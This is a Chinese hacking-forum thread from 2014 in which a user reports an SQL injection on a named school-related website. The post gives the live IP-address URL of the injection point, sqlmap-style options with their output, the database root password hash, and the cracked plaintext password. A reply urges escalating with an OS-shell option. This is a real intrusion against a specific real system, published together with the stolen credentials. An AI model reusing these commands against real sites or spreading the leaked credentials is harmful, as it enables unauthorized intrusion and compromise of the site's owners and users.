长沙市雅礼先锋网SQL注入漏洞

net1user · 发表于 2014-8-8 05:51:01

尼玛管理干嘛去了 root权限。。。。。

注入点：http://218.77.114.11:8088/detail_show.php?id=311 这站看都不要看；随便找条尼玛全站都射点哪射哪。

既然是root直接点~ http://218.77.114.11:8088/detail_show.php?id=311 --passwords -v 0 {:soso_e141:} {:soso_e141:}
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL 5.0
[05:39:48] [INFO] resumed: root
[05:39:48] [INFO] resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6
[05:39:48] [INFO] resumed: root
[05:39:48] [INFO] resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6
[05:39:48] [INFO] resumed:
[05:39:48] [INFO] resumed:
[05:39:48] [INFO] resumed: root
[05:39:48] [INFO] resumed: *AEAFAF2FA36BD55E6B2D610C7D9CB49C87FF18C6

查询结果：
Justdoit2013@

nerd · 发表于 2014-8-8 13:22:34

新人帮顶，运气真好

lyrric · 发表于 2014-8-8 14:22:42

你们用的那个工具是啥啊？

phantomer · 发表于 2014-8-8 17:48:20

继续日下去。
--os-shell

神风 · 发表于 2014-8-10 13:35:17

给力 ;

长沙市雅礼先锋网SQL注入漏洞

指导单位

旗下站点

联系我们